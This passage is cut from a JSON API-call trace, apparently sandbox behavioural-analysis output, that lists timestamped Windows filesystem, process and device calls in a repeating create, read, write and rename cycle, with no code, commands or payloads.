"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,306", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,306", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,306", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,316", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,316", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,316", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,316", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,316", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,316", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,316", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,316", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,316", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,326", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,326", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,326", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,326", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,326", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,326", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,326", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,326", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,346", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,346", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,346", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,346", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,346", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,346", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,346", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,346", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,356", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,356", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,356", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,386", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,386", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,386", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,386", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,386", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,386", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,396", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,396", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,396", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,396", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,396", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,396", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,396", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,396", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,406", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,406", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,406", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,406", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,406", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,406", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,406", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,406", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,406", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,416", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,416", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,416", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,416", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,416", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,416", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,426", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,426", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,426", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,426", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,426", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,426", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,426", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,436", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,436", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,436", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,436", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,436", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,436", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,436", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,436", "api": "NtWriteFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:05,436", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,436", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,436", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,446", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,446", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,446", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,446", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,446", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,446", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,446", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,446", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,446", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,456", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,456", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,456", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,456", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,456", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,456", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,456", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,466", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,466", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,466", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,466", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,466", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,466", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:42:05,466", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:05,466", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:05,466", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:05,466", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:05,466", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,466", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,466", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:42:05,476", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,496", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,496", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,496", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,496", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,496", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,496", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,496", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,496", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,506", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,506", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,506", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,506", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,506", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,506", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,506", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,506", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,506", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,506", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,506", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,516", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,516", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,516", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,516", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,516", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,516", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,516", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,526", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,526", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,526", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,526", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,526", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,526", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,526", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,526", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,526", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,536", "api": "NtWriteFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:05,536", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,536", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,536", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,536", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,536", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,536", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,546", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,546", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,546", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,546", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,546", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,546", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,546", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,556", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,556", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,556", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,556", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,556", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,556", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,556", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,566", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,566", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,566", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,566", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,566", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,566", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,566", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,566", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,576", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,576", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,576", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,576", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,576", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,576", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,576", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,576", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,586", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,586", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,586", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,586", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,586", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,586", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,586", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,586", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,596", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,596", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,596", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,596", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,596", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,596", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,596", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,596", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,596", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,606", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,606", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,606", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,606", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,606", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,606", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,606", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,606", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,616", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,616", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,616", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,616", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,616", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,616", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,616", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,627", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,627", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,627", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,627", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,627", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,627", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,637", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,637", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,637", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,637", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,637", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,637", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,637", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,637", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,647", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,647", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,647", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,647", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,647", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,647", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,647", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,647", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,657", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,657", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,657", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,657", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,657", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,657", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,657", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,657", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,657", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,657", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,667", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,667", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,667", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,667", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,667", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,667", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,687", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,697", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,697", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,707", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,707", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,707", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,707", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,707", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,707", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,707", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,707", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,717", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,717", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,717", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,717", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,717", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,717", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,717", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,717", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,727", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,727", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,727", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,727", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,727", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,727", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,727", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,727", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,737", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,737", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,737", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,737", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,737", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,737", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,737", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,737", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,747", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,747", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,747", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,747", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,747", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,747", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,747", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,747", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,757", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,757", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,757", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,757", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,757", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,757", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,757", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,757", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,767", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,767", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,767", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,767", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,767", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,767", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 